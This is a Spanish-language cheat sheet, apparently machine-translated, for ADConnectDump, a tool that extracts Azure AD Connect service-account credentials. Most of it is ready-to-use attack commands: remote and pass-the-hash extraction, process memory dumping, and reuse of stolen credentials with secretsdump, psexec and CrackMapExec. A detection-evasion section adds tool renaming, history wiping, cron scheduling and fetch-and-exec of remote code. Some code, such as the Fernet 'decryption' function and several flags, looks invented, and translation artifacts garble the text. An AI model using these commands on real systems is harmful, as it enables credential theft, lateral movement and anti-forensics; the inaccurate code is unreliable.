ADConnectDump Azure AD Connect Credential Extraction Tool Cheat Sheet
"Clase de la hoja" idbutton id="adconnectdump-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="adconnectdump-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
ADConnectDump es una herramienta desarrollada por Dirk-Jan Mollema para extraer credenciales y configuración de los servidores Azure AD Connect. Puede dejar las credenciales de la cuenta de servicio Azure AD Connect, que a menudo tienen altos privilegios tanto en los entornos Active Directory como Azure AD.
NOVEDAD Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y evaluaciones de seguridad. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación
Instalación del módulo PowerShell
# Download from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py" -OutFile "adconnectdump.py"
# Install Python dependencies
pip install impacket cryptography
# Alternative: Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
pip install -r requirements.txt
Instalación manual
# Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
# Install dependencies
pip3 install impacket cryptography pyasn1
# Make executable
chmod +x adconnectdump.py
Docker Instalación
# Build Docker image
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
docker build -t adconnectdump .
# Run in Docker
docker run -it -v $(pwd):/data adconnectdump
Uso básico
Extracción temporal local
# Extract credentials from local AAD Connect server
python3 adconnectdump.py
# Extract with specific database
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract with custom output
python3 adconnectdump.py --output credentials.txt
# Extract in JSON format
python3 adconnectdump.py --format json --output credentials.json
Extracción de Media Credencial
# Extract from remote server
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password
# Extract using NTLM hash
python3 adconnectdump.py --host 192.168.1.100 --username administrator --hashes :ntlmhash
# Extract using Kerberos
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password --use-kerberos
# Extract with domain credentials
python3 adconnectdump.py --host 192.168.1.100 --username domain\\administrator --password password
Referencia del Comando
Opciones básicas
| Option | Description |
|---|---|
--host |
Target hostname or IP |
--username |
Username for authentication |
--password |
Password for authentication |
--hashes |
NTLM hashes (LM:NT format) |
--database |
Path to ADSync database |
--output |
Output file path |
Opciones avanzadas
| Option | Description |
|---|---|
--format |
Output format (text/json) |
--use-kerberos |
Use Kerberos authentication |
--dc-ip |
Domain controller IP |
--target-ip |
Target IP address |
--port |
Target port (default 445) |
--debug |
Enable debug output |
Azure AD Connect Architecture
Entendimiento AAD Conectar
# Azure AD Connect components:
# 1. Synchronization Service (ADSync)
# 2. Database (LocalDB or SQL Server)
# 3. Service Accounts
# 4. Configuration Data
# Key files and locations:
# Database: C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
# Config: C:\Program Files\Microsoft Azure AD Sync\Bin\
# Logs: C:\ProgramData\AADConnect\
Identificación de la cuenta de servicio
# Identify AAD Connect service accounts
Get-Service|Where-Object \\\\{$_.Name -like "*ADSync*"\\\\}
# Check service account privileges
Get-WmiObject -Class Win32_Service|Where-Object \\\\{$_.Name -eq "ADSync"\\\\}|Select-Object StartName
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect" -Name "Version"
Técnicas de Extracción Credencial
Acceso a bases de datos locales
# Direct database access (requires local admin)
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract from backup database
python3 adconnectdump.py --database "C:\Backup\ADSync_backup.mdf"
# Extract from SQL Server instance
python3 adconnectdump.py --sql-server "SQLSERVER\INSTANCE" --database "ADSync"
Extracción remota mediante SMB
# Extract via SMB with credentials
python3 adconnectdump.py --host aadconnect.domain.com --username "domain\admin" --password "password"
# Extract using pass-the-hash
python3 adconnectdump.py --host aadconnect.domain.com --username "admin" --hashes ":aad3b435b51404eeaad3b435b51404ee:hash"
# Extract with specific target IP
python3 adconnectdump.py --host aadconnect.domain.com --target-ip 192.168.1.100 --username "admin" --password "password"
Extracción de memoria
# Extract from memory (requires admin privileges)
# Use tools like Mimikatz or ProcDump
# Dump ADSync process memory
procdump.exe -ma miiserver.exe aadsync_dump.dmp
# Extract credentials from memory dump
python3 adconnectdump.py --memory-dump aadsync_dump.dmp
Análisis de configuración
Análisis del esquema de base de datos
-- Key tables in ADSync database
-- mms_management_agent: Contains connector information
-- mms_server_configuration: Server configuration
-- mms_synchronization_rule: Sync rules
-- mms_metaverse_object: Metaverse objects
-- Extract connector information
SELECT ma_name, ma_type, private_configuration_xml
FROM mms_management_agent;
-- Extract server configuration
SELECT applied_time, configuration_xml
FROM mms_server_configuration;
Análisis de archivos de configuración
# Analyze AAD Connect configuration files
$configPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\"
# Check connector configurations
Get-ChildItem -Path $configPath -Filter "*.xml"|ForEach-Object \\\\{
[xml]$config = Get-Content $_.FullName
Write-Host "File: $($_.Name)"
Write-Host "Connectors: $($config.SelectNodes('//connector').Count)"
\\\\}
# Extract service account information
$serviceConfig = Get-Content "$configPath\miiserver.exe.config"
$serviceConfig|Select-String -Pattern "connectionString\|serviceAccount"
Desencriptación credencial
Encriptación
# AAD Connect credential encryption process
# 1. Credentials encrypted with DPAPI
# 2. Machine key used for encryption
# 3. Service account context required
# Decryption process
import base64
from cryptography.fernet import Fernet
def decrypt_aad_connect_password(encrypted_password, key):
"""Decrypt AAD Connect password"""
try:
# Base64 decode
encrypted_data = base64.b64decode(encrypted_password)
# Decrypt using key
f = Fernet(key)
decrypted = f.decrypt(encrypted_data)
return decrypted.decode('utf-8')
except Exception as e:
print(f"Decryption failed: \\\\{e\\\\}")
return None
Desencriptación manual
# Manual credential decryption (PowerShell)
Add-Type -AssemblyName System.Security
function Decrypt-AADConnectPassword \\\\{
param(
[string]$EncryptedPassword,
[byte[]]$Key
)
try \\\\{
# Convert from base64
$encryptedBytes = [Convert]::FromBase64String($EncryptedPassword)
# Decrypt using DPAPI
$decryptedBytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$null,
[System.Security.Cryptography.DataProtectionScope]::LocalMachine
)
return [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
\\\\}
catch \\\\{
Write-Error "Decryption failed: $_"
return $null
\\\\}
\\\\}
Técnicas de despliegue
Utilizando credenciales extraídas
# Use extracted Azure AD credentials
# Typically format: MSOL_<guid>@<tenant>.onmicrosoft.com
# Authenticate to Azure AD
az login --username "MSOL_12345678-1234-1234-1234-123456789012@company.onmicrosoft.com" --password "extracted_password"
# Use with AADInternals
Import-Module AADInternals
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "MSOL_account@company.onmicrosoft.com" -Password "extracted_password"
Acceso Active Directory
# Use extracted on-premises credentials
# Format: domain\username
# Authenticate to domain
net use \\dc.domain.com\c$ /user:domain\MSOL_service_account extracted_password
# Use with Impacket tools
python3 secretsdump.py domain/MSOL_service_account:extracted_password@dc.domain.com
# Use with CrackMapExec
crackmapexec smb dc.domain.com -u MSOL_service_account -p extracted_password
Escalada de Privilege
# Check privileges of extracted account
Import-Module ActiveDirectory
Get-ADUser -Identity "MSOL_service_account" -Properties MemberOf|Select-Object -ExpandProperty MemberOf
# Check Azure AD privileges
Import-Module AADInternals
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "MSOL_account@company.onmicrosoft.com"
Evasión de detección
Técnicas de Stealth
# Use legitimate tools and processes
# Avoid suspicious file names
# Use memory-only techniques when possible
# Rename tool
cp adconnectdump.py system_maintenance.py
# Use legitimate paths
mkdir -p /tmp/.system/maintenance/
cp adconnectdump.py /tmp/.system/maintenance/syscheck.py
Anti-Forenseics
# Clear evidence after extraction
rm -f credentials.txt
rm -f credentials.json
history -c
# Use in-memory execution
python3 -c "
import urllib.request
exec(urllib.request.urlopen('https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py').read())
"
Calendario y programación
# Perform extraction during maintenance windows
# Schedule for off-hours
# Use legitimate administrative sessions
# Example: Schedule extraction
echo "0 2 * * 0 /usr/bin/python3 /tmp/adconnectdump.py --output /tmp/.cache/system.log"|crontab -
Medidas de defensa
Vigilancia y detección
# Monitor AAD Connect database access
# Enable SQL Server auditing
# Monitor file system access to ADSync.mdf
# PowerShell monitoring script
$databasePath = "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = Split-Path $databasePath
$watcher.Filter = "ADSync.mdf"
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent -InputObject $watcher -EventName "Changed" -Action \\\\{
Write-EventLog -LogName "Application" -Source "AADConnect Monitor" -EventId 1001 -Message "ADSync database accessed"
\\\\}
Recomendaciones de endurecimiento
# Secure AAD Connect server
# 1. Restrict local admin access
# 2. Enable advanced auditing
# 3. Use dedicated service accounts
# 4. Implement network segmentation
# 5. Regular security updates
# Enable auditing
auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable
Automatización y scripting
Script de Extracción Automatizada
#!/bin/bash
# Automated ADConnectDump script
TARGET_HOST="$1"
USERNAME="$2"
PASSWORD="$3"
OUTPUT_DIR="./adconnect_output"
if [ $# -ne 3 ]; then
echo "Usage: $0 <target_host> <username> <password>"
exit 1
fi
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Extract credentials
echo "Extracting AAD Connect credentials from $TARGET_HOST..."
python3 adconnectdump.py \
--host "$TARGET_HOST" \
--username "$USERNAME" \
--password "$PASSWORD" \
--format json \
--output "$OUTPUT_DIR/credentials_$(date +%Y%m%d_%H%M%S).json"
# Check if extraction was successful
if [ $? -eq 0 ]; then
echo "Extraction completed successfully"
echo "Output saved to $OUTPUT_DIR"
else
echo "Extraction failed"
exit 1
fi
Automatización PowerShell
# PowerShell automation script
param(
[string]$TargetHost,
[string]$Username,
[string]$Password,
[string]$OutputPath = ".\adconnect_output"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
# Extract credentials
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = Join-Path $OutputPath "credentials_$timestamp.json"
Write-Host "Extracting AAD Connect credentials from $TargetHost..."
$process = Start-Process -FilePath "python3" -ArgumentList @(
"adconnectdump.py",
"--host", $TargetHost,
"--username", $Username,
"--password", $Password,
"--format", "json",
"--output", $outputFile
) -Wait -PassThru -NoNewWindow
if ($process.ExitCode -eq 0) \\\\{
Write-Host "Extraction completed successfully"
Write-Host "Output saved to $outputFile"
# Parse and display results
$credentials = Get-Content $outputFile|ConvertFrom-Json
Write-Host "Extracted $($credentials.Count) credential(s)"
\\\\} else \\\\{
Write-Error "Extraction failed with exit code $($process.ExitCode)"
\\\\}
Solución de problemas
Cuestiones comunes
# Database access denied
# Solution: Ensure proper privileges or use alternative extraction method
# Network connectivity issues
# Solution: Check firewall rules and network connectivity
ping aadconnect.domain.com
telnet aadconnect.domain.com 445
# Authentication failures
# Solution: Verify credentials and domain trust
net use \\aadconnect.domain.com\c$ /user:domain\username password
Modo de depuración
# Enable debug output
python3 adconnectdump.py --debug --host aadconnect.domain.com --username admin --password password
# Verbose logging
python3 adconnectdump.py -v --host aadconnect.domain.com --username admin --password password
# Test connectivity
python3 adconnectdump.py --test-connection --host aadconnect.domain.com
Verificación manual
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect"
# Check service status
Get-Service -Name "ADSync"
# Verify database location
$regPath = "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL13.LOCALDB\MSSQLServer"
Get-ItemProperty -Path $regPath -Name "DefaultData"
Integración con otras herramientas
Impacket Integration
# Use extracted credentials with Impacket
python3 secretsdump.py domain/extracted_user:extracted_password@dc.domain.com
# Use with GetUserSPNs
python3 GetUserSPNs.py domain/extracted_user:extracted_password -dc-ip dc.domain.com
# Use with psexec
python3 psexec.py domain/extracted_user:extracted_password@target.domain.com
Integración de la sangre
# Use extracted credentials for BloodHound collection
Import-Module SharpHound
Invoke-BloodHound -CollectionMethod All -Domain domain.com -LDAPUser extracted_user -LDAPPass extracted_password
CrackMapExec Integración
# Use extracted credentials with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password
# Check for local admin access
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password --local-auth
# Execute commands
crackmapexec smb target.domain.com -u extracted_user -p extracted_password -x "whoami"
Recursos
- ADConnectDump GitHub Repository
- Fox-IT Blog en Azure AD Connect
- Azure AD Connect Security
- Dirk-Jan Mollema Research
- Azure AD Security Best Practices
-...
*Esta hoja de trampa proporciona una referencia completa para usar ADConnectDump. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad de Azure AD Connect. *